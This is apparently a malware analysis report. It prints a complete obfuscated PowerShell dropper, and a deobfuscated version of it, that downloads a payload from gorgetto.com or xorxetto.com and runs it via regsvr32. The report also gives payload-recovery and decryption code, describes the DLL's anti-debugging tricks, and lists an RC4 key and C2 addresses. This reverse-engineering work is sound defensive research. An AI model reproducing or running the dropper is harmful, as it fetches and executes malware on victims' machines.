     s});((  (  .("{0}{1}{2}{3}"-f 'G','e',("{2}{0}{1}"-f 'vaR','ia','T-'),'BLE')  ("{1}{2}{0}"-f'wA','CK','FQ')  -valU )::("{1}{3}{4}{2}{0}" -f 'me','L','lNa','oa',("{2}{0}{1}"-f 'P',("{0}{1}"-f'a','rtia'),("{1}{0}" -f 'h','dWit')))."Inv`Oke"(("{1}{3}{0}{2}"-f'w','Wi',("{1}{0}" -f'e',("{1}{0}" -f 's','sBa')),'ndo'))).("{0}{1}{2}" -f("{0}{1}" -f'G','etT'),'yp','e')."i`NvOke"(("{3}{6}{4}{5}{8}{1}{7}{0}{2}" -f ("{1}{2}{0}" -f'o',("{0}{1}"-f 'tiv','eMe'),'th'),'N','ds','MS','n3','2','.Wi','a',("{0}{1}"-f("{1}{0}"-f'ns','.U'),'afe'))))::("{1}{2}{0}"-f'Pos','S',("{0}{1}" -f 'e',("{0}{2}{1}" -f 'tW','w','indo')))."iN`VOke"(${
     X`X},${
     T},${
     s},${
     s},${
     N`N},${
     N`N},64.5*256);${
     i}=("{0}{1}{2}"-f("{1}{0}"-f ("{0}{1}"-f 'm',' /g'),'o'),'o','rg');${
     i}=${
     i}.("{0}{1}"-f'spl','it')."In`Vo`ke"(' ');${
     s`S}=.('m2')((  ( &("{0}{1}{2}{3}"-f'gE',("{0}{1}" -f't','-va'),("{1}{0}" -f'IaB','R'),'LE') ("{0}{1}"-f ("{0}{1}"-f 'F','i0eD'),'w') )."va`lUe"::("{0}{2}{1}{3}"-f 'Get','n',("{0}{1}"-f 'Cu','rre'),'t')."inv`O`kE"())."uS`eR"."VA`lUE");${
     e}='ht'+'t'+("{1}{0}"-f':/','ps')+${
     I}[${
     G}]+("{0}{1}"-f 'ett','o')+'.c'+(${
     I}[${
     s},${
     g}] -replace '(\D{5})','/')+'?'+${
     ss};
 if(!(&(Test-Connection) -Cn ${
     E}.(split)."iN`V`oke"('/')[2].("{2}{1}{0}"-f'd','mEn','Tri')."I`NV`oKE"(' ') -BufferSize 16 -Count 1 -ea 0 -quiet))
 {
     ${
     E}=${
     E} -replace('g','x')};.('Si') ("{2}{1}{0}"-f("{0}{1}"-f ("{0}{1}" -f 'ble',':'),'/f'),'ria','Va') ${
     E}.("{0}{1}" -f ("{0}{1}" -f'rep','l'),'ace')."IN`VOke"(' ',${
     yl});&('Sv') 1 ("{0}{2}{1}"-f'N',("{2}{1}{0}"-f 'nt','e',("{1}{0}{2}" -f 'e','W','bCli')),'et.');
 .('SI') (Variable:C2) (&("") (.('Gv') 1 -Va));
 .('SV') ('c') ("{2}{0}{1}" -f ("{1}{0}"-f 'Dat',("{1}{0}"-f'oad','nl')),'a','Dow');${
     o`AD}=(([Char[]](&("{0}{1}{2}"-f'Va','ri',("{1}{0}"-f 'e','abl')) ('C2') -ValueOn).((.("{1}{2}{0}" -f'ble','Va','ria') ('c') -Val))."IN`Voke"((.("{1}{2}{0}"-f'ble',("{0}{1}" -f 'Var','i'),'a') ('f'))."vA`Lue"))-Join${
     YL});${
     t`Fg}=${
     E`N`V:TEMP};${
     mi}=(${
     D}=&("{0}{1}" -f'gc','i') 
 ${
     t`FG}|.("{0}{1}{3}{2}" -f 'g',("{1}{0}"-f 'r','et-'),'dom','an'))."n`Ame" -replace ".{4}$";
 ${
     W}=${
     T`FG}+'\'+${
     MI}+'.';${
     VM}=${
     o`Ad}.("{2}{0}{1}{3}"-f'u',("{1}{0}"-f("{0}{1}"-f 'str','i'),'b'),'s','ng')."INv`o`KE"(${
     s},${
     g});${
     p}=[int]${
     vM}*${
     N`N};${
     L`qa} =${
     o`AD}.("{1}{0}" -f've',("{0}{1}"-f 'r','emo'))."In`VOke"(${
     s},${
     g});${
     p`L}=${
     l`qA} -split'!';&("{1}{0}"-f'l','sa') ("{0}{1}"-f'pi','i') ("{1}{2}{0}" -f ("{1}{0}"-f '32','vr'),'r','egs');${
     j`P}= ${
     w`A5k}::"u`TF8";function V`A(${
     z`X}){
     ${
     S`A}= ${
     B`UM}::("{3}{1}{2}{0}" -f 'ing',("{1}{0}"-f '64S',("{1}{0}" -f'Base','m')),'tr','Fro')."IN`VoKE"(${
     zx});return ${
     s`A}};foreach(${
     i`T} in ${
     P`l}[${
     s}]){
     ${
     G}=@();${
     P`PT}=${
     v`m}.("{3}{2}{1}{0}"-f'ay','r',("{0}{1}" -f'har','Ar'),'ToC')."In`VOKE"();${
     I`T}=.('va')(${
     i`T});for(${
     J`L}=${
     S}; ${
     JL} -lt ${
     I`T}."C`ouNt"; ${
     j`l}++){
     ${
     g} += [char]([Byte]${
     I`T}[${
     j`l}] -bxor[Byte]${
     P`pt}[${
     jL}%${
     P`Pt}."CO`UnT"])}};${
     v`V}=${
     l`qa}."R`Ep`Lace"((${
     P`l}[${
     S}]+"!"),${
     J`p}."G`eTsTrI`NG"(${
     G}));  ( .("{0}{1}"-f'di','R')  ("{1}{2}{0}"-f'p','Var',("{2}{3}{0}{1}"-f'BlE',':ubIkm','i','A'))  )."vA`LUE"::("{1}{0}{3}{2}"-f 'A',("{0}{1}" -f 'Wri','te'),'tes',("{0}{1}" -f 'llB','y'))."IN`Voke"(${
     W},(&('va')(${
     V`V} -replace ".{200}$")));if((&("{1}{0}"-f 'i','gc') ${
     W})."lEn`gTh" -lt ${
     P}){
     exit};.("{0}{1}"-f ("{0}{1}"-f 'sle','e'),'p') 17;&("{1}{0}"-f 'i','pi') -s ${
     w};.("{0}{1}" -f'sl','eep') 17; (  &("{1}{2}{0}"-f("{0}{1}"-f'ItE','M'),("{1}{0}" -f 'hiL','c'),'D') ("{0}{2}{1}" -f("{0}{1}"-f'vari','A'),("{1}{0}" -f'mP','bIk'),("{1}{0}" -f 'le:u','b')))."va`LUe"::"w`RiTEaLll`ineS"."iNv`Oke"(${
     w}, (.('Ls') ('V'+'aR'+("{1}{0}" -f 'aBL','i')+("{0}{1}{2}" -f'E:','sa','61z')))."vAL`UE"::("{1}{0}" -f 'ace',("{1}{0}" -f'pl','re'))."inV`O`ke"(${
     SS},'\d',${
     yl}))

Manually deobfuscated, it is roughly as follows:

${ckfqWa}=[TYPe]("refLectION.aSSEMbLy") ;
${FI0Edw}  =[tYpe]("SYStEM.SECurItY.pRInCiPAL.wIndoWsiDENTiTY") ;
SET-ITeM  vARiAblE:WA5k [TyPE]("teXt.EnCodIng")  ;
Set-VARIAblE bUM [Type]("cONVeRt")  ;
sET-vArIaBLE UbIkMp   [TypE]("Io.fiLE")  ;
${Sa61Z}= [tYPE]("rEgex")  ;
${NN}=10*10;
${yL}='';
${S}=0;
${G}=1;
function m2(${iH})
{
	${ih}.substring.INvOke(${g}) -replace('-','')) -replace('S','');
	return ${_}
};
${Qe}=(Get-Process -Id ${pId}).MAINwINDOwhANDle;
${CA}=[Runtime.InteropServices.HandleRef];
${XX}=New-Object Runtime.InteropServices.HandleRef(1,(Get-Process -Id ${pId}).MAINwINDOwhANDle);
${t}=New-Object Runtime.InteropServices.HandleRef(2,0);
(( refLectION.aSSEMbLy::LoadWithPartialName.InvOke(WindowsBase)).(GetType).iNvOke((MS.Win32.UnsafeNativeMethods)))::(SetWindowPos).iNVOke(${XX},${T},0,0,100,100,64.5*256);
${i}="om","/gorg";
${sS}=m2(( [SYStEM.SECurItY.pRInCiPAL.wIndoWsiDENTiTY]::(GetCurrent).invOkE()).uSeR.VAlUE);# get the current user's SID and transform it
${e}='https://gorgetto.com/'+'?'+${ss};
if(!(&Test-Connection -Cn ${E}.(split).iNVoke('/')[2].(TrimEnd).INVoKE(' ') -BufferSize 16 -Count 1 -ea 0 -quiet))# test connectivity to the domain gorgetto.com
{
	${E}=${E} -replace('g','x')# switch to the domain xorxetto.com
};
Si (Variable:/f) ${E}.replace.INVOke(' ','');# set variable f to https://xorxetto.com/?1521759461550145307086515799519
Sv 1 "Net.WebClient";
SI (Variable:C2) (New-Object Gv 1 -Va);# C2 is a Net.WebClient
SV ('c') (DownloadData);
${oAD}=(([Char[]]Net.WebClient.DownLoadData).INVoke($e)-Join${YL});# ${oAD} is the downloaded data
${tFg}=${ENV:TEMP};# get the temp directory
${mi}=(${D}=&("gci") ${tFG}|.(get-random))."nAme" -replace ".{4}$";
${W}=${TFG}+'\'+${MI}+'.';
${VM}=${oAd}.(substring)."INvoKE"(0,1);
${p}=[int]${vM}*${NN};
${Lqa} =${oAD}.(remove)."InVOke"(${s},${g});# remove(0,1): strip the first character
${pL}=${lqA} -split'!';# split on '!'
&(sal) (pii) (regsvr32);
${jP}= teXt.EnCodIng::"uTF8";
function VA(${zX})
{
	${SA}= cONVeRt::(FromBase64String)."INVoKE"(${zx});
	return ${sA}
};
foreach(${iT} in ${Pl}[${s}])# pl is the downloaded data
{
${G}=@();
${PPT}=${vm}.(ToCharArray)."InVOKE"();
${IT}=.va(${iT});
	for(${JL}=${S}; ${JL} -lt ${IT}."CouNt"; ${jl}++)
	{
		${g} += [char]([Byte]${IT}[${jl}] -bxor[Byte]${Ppt}[${jL}%${PPt}."COUnT"])
	}
};
${vV}=${lqa}."REpLace"((${Pl}[${S}]+"!"),${Jp}."GeTsTrING"(${G}));
( .(diR)  Io.fiLE::(WriteAllBytes)."INVoke"(${W},(&('va')(${VV} -replace ".{200}")));
if((&(gci) ${W})."lEngTh" -lt ${P})
{
	exit
};
regsvr32 -s ${w};
&(chiLDItEM) Io.fiLE::writealllineS."iNvOke"(${w}, (ls ('VAR'+(iaBL)+("E:sa61z")))."vALUE"::(replace)."inVOke"(${SS},'\d',${yl}

After decryption, the logic is roughly as follows.

Data is downloaded from a website; the domains are:

gorgetto.com

xorxetto.com

After stripping some interleaved junk, the data is Base64-decoded, written to a file with a randomly generated name in the temp directory, and that file is launched.

regsvr32 -s ${w}; judging from this command line, the decrypted file is a DLL.
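The payload-recovery steps of the deobfuscated script, reconstructed as an added Python function (not the author's code) so that a captured download can be turned back into the DLL: the first character is both the XOR key and the size check, the first '!'-delimited chunk is Base64- and XOR-encoded, and 200 trailing characters are padding. The input below is constructed for the test, not a real capture.

```python
import base64


def recover_payload(download: str) -> bytes:
    """Undo the unpacking the script performs before regsvr32 is run.

    Layout reconstructed from the script (assumption: no other '!' in the data):
      <digit d><b64(xor(prefix, d))>'!'<rest of b64(dll)><200 trailing junk chars>
    The file is only used if it is at least d*100 bytes long.
    """
    key_char = download[0]                    # ${VM}: first character of the download
    min_len = int(key_char) * 100             # ${p}: [int]${VM} * ${NN}
    body = download[1:]                       # ${Lqa}: remove(0,1)
    first_chunk = body.split("!")[0]          # ${pL}[0]: text before the first '!'
    xored = base64.b64decode(first_chunk)     # VA(): FromBase64String
    key = key_char.encode("utf-8")            # ${PPT}: the key character(s)
    plain = bytes(b ^ key[i % len(key)] for i, b in enumerate(xored))  # the -bxor loop
    spliced = body.replace(first_chunk + "!", plain.decode("utf-8"))   # ${vV}
    dll = base64.b64decode(spliced[:-200])    # -replace ".{200}$", then VA()
    if len(dll) < min_len:                    # the script exits when the file is too short
        raise ValueError("payload shorter than %d bytes, script would exit" % min_len)
    return dll


def build_sample_download(dll: bytes, key_digit: str = "7", split_at: int = 24) -> str:
    """Constructed test input that follows the layout above (not a real capture)."""
    b64 = base64.b64encode(dll).decode("ascii")
    prefix, rest = b64[:split_at], b64[split_at:]
    key = key_digit.encode("utf-8")
    xored = bytes(b ^ key[i % len(key)] for i, b in enumerate(prefix.encode("ascii")))
    return key_digit + base64.b64encode(xored).decode("ascii") + "!" + rest + "#" * 200


# Constructed stand-in for the DLL: an MZ header followed by 768 filler bytes.
SAMPLE_DLL = b"MZ" + bytes(range(256)) * 3

if __name__ == "__main__":
    captured = build_sample_download(SAMPLE_DLL)
    recovered = recover_payload(captured)
    print("recovered %d bytes, header %r" % (len(recovered), recovered[:2]))
```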

DLL Analysis

The sample is run via regsvr32.exe, so loading it directly with OllyDbg's ldrdll.exe fails.

Decoding

Debugging the DLL, there is a block of junk instructions at DllMain.

[Figure 6]

It first fills and decrypts the .data section, and changes the section to be readable, writable and executable.

[Figure 7]

The .data section decryption algorithm is as follows:

/* Reconstructed .data decryption routine. 0x9ba is the section length and
   0x45688ad0 the key observed in the sample. ror() is the x86 rotate-right;
   the width is assumed here to be the 32-bit register the instruction acts on.
   Note the loop touches bytes up to index 0x9bb, so the buffer needs 0x9bc bytes. */
static unsigned int ror32(unsigned int v, int n)
{
    return (v >> n) | (v << (32 - n));
}

void decrypt_data(unsigned char *encode)
{
    unsigned int key = 0x45688ad0;
    for (int i = 0; i < 0x9ba; i += 4)
    {
        key = ((key & 0xffff) * 2) & 0xffff;
        key = (key * 3) & 0xffff;
        key = ror32(key, 5);
        for (int j = 0; j < 4; j++)
        {
            encode[i + j] ^= (key & 0xf);
        }
    }
}

It then resolves functions; the hash algorithm used for function resolution is as follows:

[Figure 8]

Next it allocates memory and sets up shellcode; that shellcode sets up a second shellcode (shellcode2), copies the DLL image into shellcode2 and decrypts the DLL image there. The decryption algorithm is the same as the .data decryption algorithm, only with key 0x67e0cfc2.

[Figure 9]

The decrypted image is copied back over the original DLL memory and control returns to the DLL module.

To resolve imports, the DLL module first uses a CRC32 checksum XORed with 0x6AECC489 to load the target DLL (ntdll); the same method is used afterwards to obtain specific functions.

[Figure 10]

Function invocation

First a VEH is registered.

[Figure 11]

Then an int3 exception is triggered, which jumps to the VEH.

The VEH sets eip = eip + 1

esp -= 4, then sets [esp] = eip + 2

esp -= 4, then sets [esp] =

After the exception has been handled the stack looks like this:

[Figure 12]

DllRegisterServer

After that, DllMain finishes unpacking itself and returns.

[Figure 13]

An export table now appears; inspecting it shows an export.

DllRegisterServer is executed.

Inside DllRegisterServer, all DLL loading goes through the exception-based EIP modification described above.

RegEnumKey(HKEY_LOCAL_MACHINE)

It enumerates the registry to collect information:

InstallDate,HARDWARE,sam,security,software,Displayname

[Figure 14]

Strings are decrypted with RC4; the key is:

1E BC A2 B5 5A 23 9B 99 65 88 FB F1 81 E0 FD 95 B7 79 DA 4F 35 D5 00 AF 40 B7 4E 69 37 0B 9E 6F 43 6A D3 3B 4D 4D C0 5E

[Figure 15]

Continuing to debug reveals the following four IP addresses and ports:

89.31.102.92:443

34.209.36.254:3074

5.189.157.183:4646

5.55.223.225:3389

[Figure 16]

It connects to 89.31.102.92 and sends a POST to '/', followed by an additional "Connection: close" header. Because the IP was down nothing was actually sent, and afterwards it keeps cycling through these IPs.

[Figure 17]

[Figure 18]

[Figure 19]
